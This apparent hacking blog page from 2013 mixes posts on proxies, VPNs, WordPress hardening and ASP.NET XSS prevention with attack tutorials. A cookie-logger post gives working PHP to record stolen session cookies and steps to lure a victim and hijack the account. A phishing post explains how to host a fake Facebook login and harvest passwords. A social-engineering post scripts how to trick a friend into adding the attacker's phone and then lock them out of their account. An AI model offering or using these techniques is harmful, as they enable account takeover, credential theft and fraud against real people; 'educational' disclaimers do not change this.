Showing posts with label Hacking Guide. Show all posts
Showing posts with label Hacking Guide. Show all posts

Wednesday, February 27, 2013

What Is Socks ?

What is socks ???



Hi Guys This Is DJ Alone... In This Post I Will Tell U...

What is Socks ???


SOCKets or SOCKS-Proxies (=Secured Over Credential-based Kerberos Services) are very similar to HTTP Proxy Server. The main difference is that they have the capability to redirect all traffic (Web, FTP, POP3, Torrent…) through a Proxy Server while HTTP-Proxies only redirect HTTP (Port 80) requests.

SOCKS-Proxies have a wide range of benefits but the most important is that they provide complete anonymity and protects all your traffic (including DNS-requests). This means that the remote server will only see the SOCKS-Server IP (Internet Protocol) instead of the real IP you got from your Internet Service Provider. Hence, absolute anonymity is evident.


But why generally use a Proxy or is it better to surf without one?

1. To hide your real identity/IP-Address

2. Unblock websites (some countries/ISP's block websites or social networks like facebook, twitter, youtube)

3. Bypass your proxy at school or work

4. Very useable for SEO-Programs

A few SOCKS Proxies even support the SMTP-Port (25) which allows you to send the Emails anonymously.

If you want to extend your Anonymity you can chain different kind of proxies together.

Examples:
SOCKS Proxy > HTTP Proxy > CGI Proxy
SOCKS Proxy > HTTP Proxy
HTTP Proxy > SOCKS Proxy
SOCKS Proxy > CGI Proxy

There are a few programs to run your own SOCKS-Proxy-Server like: SS5, WinSocks, OpenSSH, Dante, Sun Java System Web proxy, Free Cap and Freeproxy.

The benefit of using public a SOCKS5 List instead of a private server is that you get a wide range of IP-Addresses and servers from all over the world which hides you identity even more.


How to use socks(Fire fox)  ???

Firefox is the most powerfull and extendable browser in the world. So how to use socks with Firefox 3, is it hard to configure and use? No, it easy.

Run Firefox

Go to Tools  → Options


Click Advanced and choose Network, then Settings
Choose Manual proxy configuration and place IP address to SOCKS Host, port to Port

After that choose SOCKS v4 for 4 version of socks or SOCKS v5 for 5 version of socks...



Click OK

Enjoy using socks in Firefox

For comfortable socks switching and configuring you can use FoxyProxy extension for Firefox...

Posted By आर्यावर्त6:41 AM

Sunday, February 3, 2013

How To Prevent Cross-Site Scripting (XSS) in ASP.NET

Hi Guys... This is DJ Alone...This Time I Thinked To Help U Guys By Posting How To Prevent XSS...

So, I'm Posting This...By This Post U Can Easily Secure Ur Website From Cross-Site Scripting Attack...

In Previous Posts We Have Seen What Is Cross Site Scripting & How It Works....If U Reading This Post First Time... First Read The XSS Post Here...


This How to shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output. It also describes a number of other protection mechanisms that you can use in addition to these two main countermeasures.

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting client-side script code. Common vulnerabilities that make your Web applications susceptible to cross-site scripting attacks include failing to properly validate input, failing to encode output, and trusting the data retrieved from a shared database. To protect your application against cross-site scripting attacks, assume that all input is malicious. Constrain and validate all input. Encode all output that could, potentially, include HTML characters. This includes data read from files and databases.

Contents

Objectives
Overview
Summary of Steps
Step 1. Check That ASP.NET Request Validation Is Enabled
Step 2. Review ASP.NET Code That Generates HTML Output
Step 3. Determine Whether HTML Output Includes Input Parameters
Step 4. Review Potentially Dangerous HTML Tags and Attributes
Step 5. Evaluate Countermeasures
Additional Considerations
Additional Resources
Objectives

Understand the common cross-site scripting vulnerabilities in Web page validation.
Apply countermeasures for cross-site scripting attacks.
Constrain input by using regular expressions, type checks, and ASP.NET validator controls.
Constrain output to ensure the browser does not execute HTML tags that contain script code.
Review potentially dangerous HTML tags and attributes and evaluate countermeasures.
Overview

Cross-site scripting attacks exploit vulnerabilities in Web page validation by injecting client-side script code. The script code embeds itself in response data, which is sent back to an unsuspecting user. The user's browser then runs the script code. Because the browser downloads the script code from a trusted site, the browser has no way of recognizing that the code is not legitimate, and Microsoft Internet Explorer security zones provide no defense. Cross-site scripting attacks also work over HTTP and HTTPS (SSL) connections.

One of the most serious examples of a cross-site scripting attack occurs when an attacker writes script to retrieve the authentication cookie that provides access to a trusted site and then posts the cookie to a Web address known to the attacker. This enables the attacker to spoof the legitimate user's identity and gain illicit access to the Web site.

Common vulnerabilities that make your Web application susceptible to cross-site scripting attacks include:

Failing to constrain and validate input.
Failing to encode output.
Trusting data retrieved from a shared database.
Guidelines

The two most important countermeasures to prevent cross-site scripting attacks are to:

Constrain input.
Encode output.
Constrain Input

Start by assuming that all input is malicious. Validate input type, length, format, and range.

To constrain input supplied through server controls, use ASP.NET validator controls such as RegularExpressionValidator and RangeValidator.
To constrain input supplied through client-side HTML input controls or input from other sources such as query strings or cookies, use the System.Text.RegularExpressions.Regex class in your server-side code to check for expected using regular expressions.
To validate types such as integers, doubles, dates, and currency amounts, convert the input data to the equivalent .NET Framework data type and handle any resulting conversion errors.
Encode Output

Use the AntiXSS.HtmlEncode method to encode output if it contains input from the user or from other sources such as databases. HtmlEncode replaces characters that have special meaning in HTML-to-HTML variables that represent those characters. For example, < is replaced with &lt; and " is replaced with &quot;. Encoded data does not cause the browser to execute code. Instead, the data is rendered as harmless HTML.

Similarly, use AntiXSS.UrlEncode to encode output URLs if they are constructed from input.

Summary of Steps

To prevent cross-site scripting, perform the following steps:

Step 1. Check that ASP.NET request validation is enabled.
Step 2. Review ASP.NET code that generates HTML output.
Step 3. Determine whether HTML output includes input parameters.
Step 4. Review potentially dangerous HTML tags and attributes.
Step 5. Evaluate countermeasures.
Step 1. Check That ASP.NET Request Validation Is Enabled
By default, request validation is enabled in Machine.config. Verify that request validation is currently enabled in your server's Machine.config file and that your application does not override this setting in its Web.config file. Check that validateRequest is set to true as shown in the following code example.

<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>

You can disable request validation on a page-by-page basis. Check that your pages do not disable this feature unless necessary. For example, you may need to disable this feature for a page if it contains a free-format, rich-text entry field designed to accept a range of HTML characters as input.

To test that ASP.NET request validation is enabled

Create an ASP.NET page that disables request validation. To do this, set ValidateRequest="false", as shown in the following code example.
<%@ Page Language="C#" ValidateRequest="false" %>
<html>
 <script runat="server">
  void btnSubmit_Click(Object sender, EventArgs e)
  {
    // If ValidateRequest is false, then 'hello' is displayed
    // If ValidateRequest is true, then ASP.NET returns an exception
    Response.Write(txtString.Text);
  }
 </script>
 <body>
  <form id="form1" runat="server">
    <asp:TextBox id="txtString" runat="server"
                 Text="<script>alert('hello');</script>" />
    <asp:Button id="btnSubmit" runat="server"
                OnClick="btnSubmit_Click"
                Text="Submit" />
  </form>
 </body>
</html>

Run the page. It displays Hello in a message box because the script in txtString is passed through and rendered as client-side script in your browser.
Set ValidateRequest="true" or remove the ValidateRequest page attribute and browse to the page again. Verify that the following error message is displayed.
A potentially dangerous Request.Form value was detected from the client (txtString="<script>alert('hello...").

This indicates that ASP.NET request validation is active and has rejected the input because it includes potentially dangerous HTML characters.

Note: Do not rely on ASP.NET request validation. Treat it as an extra precautionary measure in addition to your own input validation.


Step 2. Review ASP.NET Code That Generates HTML Output
ASP.NET writes HTML as output in two ways, using "Response.Write" and "<% = ". Search your pages to locate where HTML and URL output is returned to the client.

Step 3. Determine Whether HTML Output Includes Input Parameters
Analyze your design and your page code to determine whether the output includes any input parameters. These parameters can come from a variety of sources. The following list includes common input sources:

Form fields, such as the following.
Response.Write(name.Text);
Response.Write(Request.Form["name"]);
Query Strings
Response.Write(Request.QueryString["name"]);

Query strings, such as the following:
Response.Write(Request.QueryString["username"]);

Databases and data access methods, such as the following:
SqlDataReader reader = cmd.ExecuteReader();
Response.Write(reader.GetString(1));

Be particularly careful with data read from a database if it is shared by other applications.

Cookie collection, such as the following:
Response.Write(
Request.Cookies["name"].Values["name"]);

Session and application variables, such as the following:
Response.Write(Session["name"]);
Response.Write(Application["name"]);

In addition to source code analysis, you can also perform a simple test by typing text such as "XYZ" in form fields and testing the output. If the browser displays "XYZ" or if you see "XYZ" when you view the source of the HTML, your Web application is vulnerable to cross-site scripting.

To see something more dynamic, inject <script>alert('hello');</script> through an input field. This technique might not work in all cases because it depends on how the input is used to generate the output.

Step 4. Review Potentially Dangerous HTML Tags and Attributes
If you dynamically create HTML tags and construct tag attributes with potentially unsafe input, make sure you HTML-encode the tag attributes before writing them out.

The following .aspx page shows how you can write HTML directly to the return page by using the <asp:Literal> control. The code takes user input of a color name, inserts it into the HTML sent back, and displays text in the color entered. The page uses HtmlEncode to ensure the inserted text is safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <form id="form1" runat="server">
    <div>
      Color:&nbsp;<asp:TextBox ID="TextBox1" runat="server"></asp:TextBox><br />
      <asp:Button ID="Button1" runat="server" Text="Show color"
         OnClick="Button1_Click" /><br />
      <asp:Literal ID="Literal1" runat="server"></asp:Literal>
    </div>
  </form>
</html>

<script runat="server">
  private void Page_Load(Object Src, EventArgs e)
  {
    protected void Button1_Click(object sender, EventArgs e)
    {
      Literal1.Text = @"<span style=""color:"
        + Server.HtmlEncode(TextBox1.Text)
        + @""">Color example</span>";
    }        
  }
</Script>

Potentially Dangerous HTML Tags

While not an exhaustive list, the following commonly used HTML tags could allow a malicious user to inject script code:

<applet>
<body>
<embed>
<frame>
<script>
<frameset>
<html>
<iframe>
<img>
<style>
<layer>
<link>
<ilayer>
<meta>
<object>
An attacker can use HTML attributes such as src, lowsrc, style, and href in conjunction with the preceding tags to inject cross-site scripting. For example, the src attribute of the <img> tag can be a source of injection, as shown in the following examples.

<img src="javascript:alert('hello');">
<img src="java&#010;script:alert('hello');">
<img src="java&#X0A;script:alert('hello');">

An attacker can also use the <style> tag to inject a script by changing the MIME type as shown in the following.

<style TYPE="text/javascript">
  alert('hello');
</style>

Step 5. Evaluate Countermeasures
When you find ASP.NET code that generates HTML using some input, you need to evaluate appropriate countermeasures for your specific application. Countermeasures include:

Encode HTML output.
Encode URL output.
Filter user input.
Encode HTML Output

If you write text output to a Web page and you do not know if the text contains HTML special characters (such as <, >, and &), pre-process the text by using the AntiXSS.HtmlEncode method as shown in the following code example. Do this if the text came from user input, a database, or a local file.

Response.Write(AntiXSS.HtmlEncode(Request.Form["name"]));

Do not substitute encoding output for checking that input is well-formed and correct. Use it as an additional security precaution.

Encode URL Output

If you return URL strings that contain input to the client, use the AntiXSS.UrlEncode method to encode these URL strings as shown in the following code example.

Response.Write(AntiXSS.UrlEncode(urlString));

Filter User Input

If you have pages that need to accept a range of HTML elements, for example through some kind of rich text input field, you must disable ASP.NET request validation for the page. If you have several pages that do this, create a filter that allows only the HTML elements that you want to accept. A common practice is to restrict formatting to safe HTML elements such as bold (<b>) and italic (<i>).

To safely allow restricted HTML input

Disable ASP.NET request validation by the adding the ValidateRequest="false" attribute to the @Page directive.
Encode the string input with the HtmlEncode method.
Use a StringBuilder and call its Replace method to selectively remove the encoding on the HTML elements that you want to permit.
The following .aspx page code shows this approach. The page disables ASP.NET request validation by setting ValidateRequest="false". It HTML-encodes the input and then selectively allows the <b> and <i> HTML elements to support simple text formatting.

<%@ Page Language="C#" ValidateRequest="false"%>

<script runat="server">
  void submitBtn_Click(object sender, EventArgs e)
  {
    // Encode the string input
    StringBuilder sb = new StringBuilder(
                         AntiXSS.HtmlEncode(htmlInputTxt.Text));

  // Selectively allow  <b> and <i>
    sb.Replace("&lt;b&gt;", "<b>");
    sb.Replace("&lt;/b&gt;", "");
    sb.Replace("&lt;i&gt;", "<i>");
    sb.Replace("&lt;/i&gt;", "");
    Response.Write(sb.ToString());
  }
</script>


<html>
  <body>
    <form id="form1" runat="server">
      <div>
        <asp:TextBox ID="htmlInputTxt" Runat="server"
                     TextMode="MultiLine" Width="318px"
                     Height="168px"></asp:TextBox>
        <asp:Button ID="submitBtn" Runat="server"
                     Text="Submit" OnClick="submitBtn_Click" />
      </div>
    </form>
  </body>
</html>

Additional Considerations

In addition to the techniques discussed previously in this How to, use the following countermeasures as further safe guards to prevent cross-site scripting:

Set the correct character encoding.
Do not rely on input sanitization.
Use the HttpOnly cookie option.
Use the <frame> security attribute.
Use the innerText property instead of innerHTML.
Set the Correct Character Encoding

To successfully restrict valid data for your Web pages, you should limit the ways in which the input data can be represented. This prevents malicious users from using canonicalization and multi-byte escape sequences to trick your input validation routines. A multi-byte escape sequence attack is a subtle manipulation that uses the fact that character encodings, such as uniform translation format-8 (UTF-8), use multi-byte sequences to represent non-ASCII characters. Some byte sequences are not legitimate UTF-8, but they may be accepted by some UTF-8 decoders, thus providing an exploitable security hole.

ASP.NET allows you to specify the character set at the page level or at the application level by using the <globalization> element in the Web.config file. The following code examples show both approaches and use the ISO-8859-1 character encoding, which is the default in early versions of HTML and HTTP.

To set the character encoding at the page level, use the <meta> element or the ResponseEncoding page-level attribute as follows:

<meta http-equiv="Content Type"
      content="text/html; charset=ISO-8859-1" />
OR
<% @ Page ResponseEncoding="iso-8859-1" %>

To set the character encoding in the Web.config file, use the following configuration.

<configuration>
   <system.web>
      <globalization
         requestEncoding="iso-8859-1"
         responseEncoding="iso-8859-1"/>
   </system.web>
</configuration>

Validating Unicode Characters

Use the following code to validate Unicode characters in a page.

using System.Text.RegularExpressions;

...

public class WebForm1 : System.Web.UI.Page
{
  private void Page_Load(object sender, System.EventArgs e)
  {
    // Name must contain between 1 and 40 alphanumeric characters
    // and (optionally) special characters such as apostrophes
    // for names such as O'Dell
    if (!Regex.IsMatch(Request.Form["name"],
               @"^[\p{L}\p{Zs}\p{Lu}\p{Ll}\']{1,40}$"))
      throw new ArgumentException("Invalid name parameter");

    // Use individual regular expressions to validate other parameters
    ...
  }
}

The following explains the regular expression shown in the preceding code:

^ means start looking at this position.
\p{ ..} matches any character in the named character class specified by {..}.
{L} performs a left-to-right match.
{Lu} performs a match of uppercase.
{Ll} performs a match of lowercase.
{Zs} matches separator and space.
'matches apostrophe.
{1,40} specifies the number of characters: no less than 1 and no more than 40.
$ means stop looking at this position.
Do Not Rely on Input Sanitization

A common practice is for code to attempt to sanitize input by filtering out known unsafe characters. Do not rely on this approach because malicious users can usually find an alternative means of bypassing your validation. Instead, your code should check for known secure, safe input. Table 1 shows various safe ways to represent some common characters.

Table 1: Character Representation

Characters

Decimal

Hexadecimal

HTML Character Set

Unicode

" (double quotation marks)

&#34

&#x22

&quot;

\u0022

' (single quotation mark)

&#39

&#x27

&apos;

\u0027

& (ampersand)

&#38

&#x26

&amp;

\u0026

< (less than)

&#60

&#x3C

&lt;

\u003c

> (greater than)

&#62

&#x3E

&gt;

\u003e

Use the HttpOnly Cookie Option

The HttpOnly cookie attribute prevents client-side scripts from accessing a cookie from the document.cookie property. Instead, the script returns an empty string. The cookie is still sent to the server whenever the user browses to a Web site in the current domain.

Use the <frame> Security Attribute

You can set the security attribute for the <frame> and <iframe> elements. You can use the security attribute to apply the user's Restricted Sites Internet Explorer security zone settings to an individual frame or iframe. By default, the Restricted Sites zone does not support script execution.

If you use the security attribute, it must be set to "restricted" as shown in the following.

<frame security="restricted" src="http://www.somesite.com/somepage.htm"></frame>

Use the innerText Property Instead of innerHTML

If you use the innerHTML property to build a page and the HTML is based on potentially untrusted input, you must use HtmlEncode to make it safe. To avoid having to remember to do this, use innerText instead. The innerText property renders content safe and ensures that scripts are not executed.

The following example shows this approach for two HTML <span> controls. The code in the Page_Load method sets the text displayed in the Welcome1 <span> element using the innerText property, so HTML-encoding is unnecessary. The code sets the text in the Welcome2 <span> element by using the innerHtml property; therefore, you must HtmlEncode it first to make it safe.

<%@ Page Language="C#" AutoEventWireup="true"%>

<html>
  <body>
    <span id="Welcome1" runat="server"> </span>
    <span id="Welcome2" runat="server"> </span>
  </body>
</html>

<script runat="server">
  private void Page_Load(Object Src, EventArgs e)
  {
    // Using InnerText renders the content safe-no need to HtmlEncode
    Welcome1.InnerText = "Hello, " + User.Identity.Name;

    // Using InnerHtml requires the use of HtmlEncode to make it safe
    Welcome2.InnerHtml = "Hello, " +
                        Server.HtmlEncode(User.Identity.Name);
  }
</Script>

Posted By आर्यावर्त3:20 AM

Tuesday, January 29, 2013

What is Cookie Logger Or Cookie Stealer?

Hi Guys... This is DJ Alone... as Per I Promised That i Will Post Cookie Logger / Cookie Stealer Tutorial...Here is This Tutorial For You...

First Of All Let Me Say Clearly... I'm Not Encourging U TO Do This...

Note :- This Tutorial is For Education Purpose Only... & Its For Better Security For Ur Self...

Now Let's Move To The Topic...


What is Cookie Logger / Cookie Stealer ???


A Cookie Logger Or Cookie Stealer is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim...

So, Today I Will Help U Guys in Making Ur Own Cookie Logger...So , Enjoy...

Step 1 :- Download The Script From Below Link and Rename it To Alone.GIF  (what ever u wanna save)...

http://www.mediafire.com/?s13y1lrpx8hc6h0

Step 2 :- Then Copy The Following Script Into NotePad & Save It As CookieLogger.PHP  (whatever u wanna save)...


$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3 :- Create a New Text File & Save it As logfile.txt

Step 4 :- Now Upload The Following Files To Ur Hosting Site... Like 000WebHost Or MY3GB...


cookielogger.php :- http://www.t3chnohacker.blogspot.com/cookielogger.php

logfile.txt :- http://www.www.t3chnohacker.blogspot.com/logfile.txt (chmod 777)

Alone.gif :- http://www.t3chnohacker.blogspot.com/alone.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://my3gb.com
http://000webhost.com

* Rename T3chno Hacker To Ur Website...

Step 5 :- Now Ur Cookie Logger / Cookie Stealer  is Ready To Be Used... Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them...

Note :- Give Ur Victim The Link Of GIF File...

Step 6 :- If Ur Victim Clicks On Ur Link U Will Get His / Her Cookies...and That Cookies Will Stored In Ur Website's logfile.txt... So, The Cookie Will Looks Like Below...


u_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 
u_sid=3bd7bdcb4e9e41737ed6eb41c43a4ec9



Step 7 :- Now All U Need To Do Is... Remove Ur Cookies Or Replace The Above Cookies With Ur Own Cookies... And Boom... Congrats U Will Succesfully Logged In To Ur Victim's Account...

Note :- Use Mozilla FireFox For This... And Use Cookie Editor ADD-ON in FireFox For Editing Cookies in Mozilla...

Step 8 :- 
For getting the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie...You can use a Cookie Editor for this...
The string before “=” is the name of the cookie and the string after “=” is its value...
So Change the values of the cookies in the cookie Editor...



Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session...
So if the Victim clicks on Logout you will also Logout automatically...
but once you have changed the password then you can again login with the new password... but the victim would not be able to login with it...

MUST READ :- I don’t take any responsibility for what you do with this script...Its Only for Educational purpose only…


How To Get Secure From Cookie Loggers / Cookie Stealer ???

Don't Click On Any Links Given By Anyone...
Use Secure Connection Security In Facebook...
Use Login Notifications For Better Security...

Don't Click On SPAM Links Videos Or Pics...

Never Ever Try RATS or KeyLoggers...

Be Safe...Don't Use Any Softwares For Hacking...Coz All Are Fakes...

Hacking is Not Playing With SomeOne's Account... 

Real Hacking is Much More Than It...


All The Hackers are Not Same... We are Humans & We Had Heart Also...

So, Wake Up Fast... With The New Techys...

DJ Alone...





Posted By आर्यावर्त11:04 PM

Wednesday, January 23, 2013

Platinum Hide IP 3.2.4.2 - Download (Mediafire Link)

Key Features
  • Anonymize Your Web Surfing
  • Your real IP is hidden when you surf on the Internet, keeping your online activity from being tracked by others.
  • Protect Your Identity
  • Anonymous web surfing enables you to prevent identity thieves from stealing your identity or other personal information, and keep your computer safe from hacker attacks or other risks.
  • Choose IP Country and Check IP
  • Proxy lists of many countries are enabled and you decide to select one country from the Choose IP Country window. You can check the current IP address directly.
  • Send Anonymous Emails
  • Send anonymous emails through any web based mail system such as Gmail, Hotmail, etc.
  • Get Unbanned from Forums and Blocked Websites
  • Change your IP address and then you can get unbanned yourself from any forums or other blocked websites that have ever banned you from...


Posted By आर्यावर्त1:00 AM

Sunday, January 20, 2013

Cyber Ghost VPN Be Anonymous On Internet

Hi Guys... This is DJ Alone...

This article will prepare you to hide your IP address and surf the internet anonymously...

Among the top VPN tools available, CyberGhostVPN provides the easy way to hide your IP, so that you make your computer anonymous online. This tool will encrypt your incoming/outgoing data transmition with special mechanism that makes a computer behind a series of proxy servers, providing the untraceable communication paths. CyberGhost is one of the favorite tool of Hackers, used for the said purposes. Below is the step by step procedure of how you can go with CyberGhost VPN.


1. First, download the soft from here...

http://cyberghostvpn.com/en/product/download.html

2. After you downloaded, run the installer. The installation process is simple, as usual...

3. After installation, make your account here...
http://cyberghostvhackingpn.com/page/registration.php

4. After your account is up, go and run the desktop shortcut for CyberGhost VPN... After running the program, you will see the following screen, be patient for a minute !

5. After a little wait, a wizard is started, click on Cancel, because we already maded our account in step 3...

6. Enter your username and password, that you made earlier and click on Log in...

7. After you logged in successfully...

8. Here you will see your current IP address. Next, click on "Connect to VPN" button, and choose "Connect to free service" from the short menu...

A window may appear now, after waiting a bit, you will see your process of getting a fake IP, is completed... You are anonymous now & Connectd To Cyber Ghost VPN...



Note :- You can click on Hide at the top right, to hide the CyberGhost window... But Don't click on close...Or It Will Get Disconnected...

Goto http://whatismyipaddress.com/ to confirm whether your IP is changed or not...

Posted By आर्यावर्त12:56 AM

Saturday, January 19, 2013

How To Secure Your WORDPRESS WebSites

Hello Guys,...This is DJ Alone...

Today I'm going to tell you the most important steps to do to have a more secured Wordpress blog. I think wordpress is the most used Webapps on cyber now; however, it's almost the easiest to be hacked and defaced! But, on the other hand, securing your wordpress is so easy. specially on linux servers...


Note:- This tutrotial is based on linux commands...so, if you're a windows server user this tutorial is not for you... 

so, lets start with our steps...


1. Harder & Longer Password

 Wordpress Hashes are so hard to crack (hardest for me xD) so making you password harder than "123456" , "admin" , "password" could help you ALOT! The first thing a hacker would do is guess your password, if he failed he'll brute force it! Hard password can save you from almost 50% of the attacks ! (In My Point of view ) When we say "hard password" it means using special characters like (@, () , [] , {} , ^ , % ,$ ,#,!,) and so on.. A longer password would not only secure you from Brute forcing, but even if you have a vulnerability like SQL injection for example and the attacker got a hash of your password (which is a Long and Full of special characters password) it would be hard as hell to crack it! and it will take them forever to crack it...


2. Securing From Symlink 

Symlink is the most common way of hacking nowadays, and securing your website from it is will help you much! For those who don't know what symlinking is can read my Symlink tutorial here.  now to secure your blog from this kind of attack, you just have to change the permissions of you configuration file. You can do that though FTP, Cpanel, a shell, etc.  just change the configuration file (wp-config.php in your case =) ) to 400
you can do that in a shell by running this command: 
chmod 400 wp-config.php
and other ways are easy, just press on the option and change (in FTP and cpanel) and always remember to remove your shell as soon as you finish working on it! xD  Chmoding this file to 400, will not allow the attack to read your configuration file from another user! and that's about it...


3.Security From Deface

 If a hacker managed to get in your admin panel (somehow)...maybe through a Trojan on your PC or something you should close all the ways that let him upload a shell or deface your website! What you can do it change the permission of all the pages (index.php, 404.php, footer.php, etc etc) in the theme to 400 (Example: chmod 400 page.php) or through your ftp or cpanel because if those files are writable there is a big change that the attacker change their source to a shell source code and deface you...



4. Finding Vulnerability & Removing It

Scan it every month just to check if any plugin have any vulnerability or something. that will make you faster than the hacker by discovering the vulnerability and patching it before someone else exploit it. and second thing you want to do is being up-to-date with 133day.com and Wordpress forums they post any discovered vulnerability and sometimes its patches. This will help you to be less exploitable....


5. Some Quick Tips

 NEVER use the same password in two different things that is related to your website....for example your Database's password & Cpanel's password, website's password and Database's password... Always use different passwords...Disable FTP when there is no use of it...Don't use "admin" or "administrator" as your username...Change Admin Panel's Password every two weeks....

Read this article on Wordpress official website (Click Here) For more security Following the above steps can prevent almost 98% of the attacks on your wordpress blog :) Hope you liked it! thanks for reading....


Credits To :- http://securitygeeks.net/

Posted By आर्यावर्त11:58 PM

Hack Facebook Accounts By Phishing

Hi Guys... This is DJ Alone...
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT Administrators are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake.

Read more for the Phishing Tutorial

Now i am going to explain you “How to do phishing”...

Just Follow the steps as indicated below and if you face any problems you are free to post your problems in comments section.

Step 1: The First Step in Making the site is to register an account at 000webhost (if you have account than you can skip first 2 steps)
Step 2Now Go to your email account that you gave and confirm your account with confirmation link 

Step 3: Now Download this Facebook Phisher (Mediafire Link)

Step 4: Now Go to 000webhost and Log into your account...
Step 5Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it...

Step 6: Now Click on the Public_html...


Step 7: Now click on the Upload button, choose the files that you have downloaded, to be uploaded...

Step 8: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected...

NOTE :- To See The Usernames and Password GO to public_html there u will see a text file...open that to see the usernames and password...
Note :- For Educational Purpose Only...







Posted By आर्यावर्त3:55 AM

Facebook Hacking (Social Engineering)


Hi... Guys... This is DJ Alone...

This is a must read  post on Facebook Hacking... With this technique you can Hack ID's of your best friends...

Requirements :-
  1. A cellphone that can receive texts
  2. A Slave (Must Be in Your friend list)
  3. Patience...

Step 1 : Pick a Target and start a conversation with him/her...

Conversation :- 

You: Hey can u help me really fast?!?
slave: Sure what do u need?
You: I told a friend of mine that i don't have a phone and hes askingwhose phone number this is: (Your number here), I told him its urs but he does not believe me…
So can you umm put this as your phone number for like 5 mins??
slave: Ok how?
You: Just go to account settings and on the left it says mobile click on that and put this number in: ( Your number here) and company is: ( Reliance, Airtel etc whatever phone company you use)
slave: K its asking for a confirmation code…
You: (You should get a confirmation code) Ok heres the code: (your code here)
slave: Kk done

Step 2 : Logout or use a different browser and open Facebook , then click on Forgot Password.

Now enter his/her details and click on Search. Then you will get a option of recovering ur Facebook ID with ur email id or Mobile. Click on Mobile. Then click send code, your phone should receive a code , enter that code. Thats it you are DONE!!!

To make sure they dont get their account back i suggest changing the email and deleting any other email registered on the account...

Posted By आर्यावर्त3:05 AM

Thursday, January 17, 2013

The Reality Of Hacking Facebook,Gmail,Yahoo Accounts

This is a must read post for the beginners and newbies who have just started exploring hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. I want you to aware about common misconceptions regarding Email/Social Networking Sites accounts hacking...
Otherwise those thoughts/misconceptions can seriously put you in trouble.
We usually start like googling this, "how to hack gmail" , "
softwares for hacking orkut","how to hack facebook" etc
 but unfortunately reach some malicious websites,
 follow stupid instructions and our own accounts get compromised.


Yes I wasn't any different and had been a foolish when I was a beginner


Okay talking in general ,
 suppose you just have signed up for an account(gmail,yahoo or any other reputed website)
Your password is stored only at two places


1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your
PC or in your girlfriend's mind etc)


Fetching your credentials (Id/password) from website's database is almost impossible.
They are paynig million of dollars for securing their systems.
Here I should remind you that, I am talking only about the reputed companies like microsoft,google,facebook etc.
 Hard Core hackers might get success in compromising their systems.


Now talking about your mind, its might be really very simple to do this. Shocked ?
At this ponit,
 I must say that hacking an email account depends strongly on carelessness/foolishness of victim.


FAQs or misconceptions regarding the same:-


Does any free/paid software/program/cracker exist to hack such accounts ?

No .You might get numberless free or preminum softwares which claim to crack email accounts.
The softwares just ask you to enter victim's email and start cracking/generating password.
I have already told you about two places where one's password is. From where the hell ,these softwares would bring passwords for you ? .

This kind of stuff is undoubtedly scam/rubbish....

Is there any free/premium online service to hack such accounts ?

No.You might have logged on to many websites that claim to crack any
email account for some amount of money.
They are completely fraud and be aware of them. Dont lose your money there ...

An Other type of fraudYou might have come across many tutorials/videos that instruct you
to compose an email to something@something.com.
You are asked to write victim's email ID, your
email ID, your password and are assured that you would get requested password within 24 hours.
Needless to say, it is an idea of befooling innocent people .
Ofcourse,your own account gets compromised...
Beleive me , you cant imagine the number of people who become victim of such rubbish things
 They
lose their money,time,accounts but get nothing in return. So take care.

How to hack these accounts ?

Every method directly/indirectly involve victim's carelessness/lack of knowledge.


Non-Technical-
While signing up for an account, we are asked to set a security question like our nickname,
birthday place etc so that we could recover our account in case we forget our password.
Many innocent people sets the correct asnwer which they are not supposed to do.
 Gather some information about victim and try to guess the answer of security question.


Technical-


1. Phishing- The most common way of hacking them is phishing. 
The common type of phishing is Fake Login Page.
The victim is anyhow anyway made to enter his credentials in fake login page which resembles the genuine login page and gets hacked. 
2.Malicious files- The victim is given a malicious file.
It could be binded with or hidden behind a genuine file.
 It is usually a keylogger or trojan.
A keylogger secretly records everything you type and sends to attacker.
Obviously records your passwords too. 
3.Stealing Sessions- Talking in simple language, whenever we sign into an account it generates a unique piece of string.
One copy is saved on server and other in our browser as cookie.
Both are matched everytime we do anything in our account.
This piece of string or login session is destroyed when we click on 'Sign Out' option.
An attacker can steal that session by convincing victim to run a piece of code in browser.
 Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim clicks 'Sign out' ,
session gets destroyed and attacker too also gets signed out.


Note-You might be thinking that one could sniff the credentials sitting in same network. 
 But I should remind you that, 
they would be encrypted ones and cracking the SSL encryption is almost impossible.


Conclusion-


Sign up for an account at gmail/yahoo/facebook/orkut/hotmail....
Now forget its password and recovery options
Never login into it ... 

Can anyhow the password be cracked/hacked.?? 
Answer is big NO... 




Posted By आर्यावर्त11:49 PM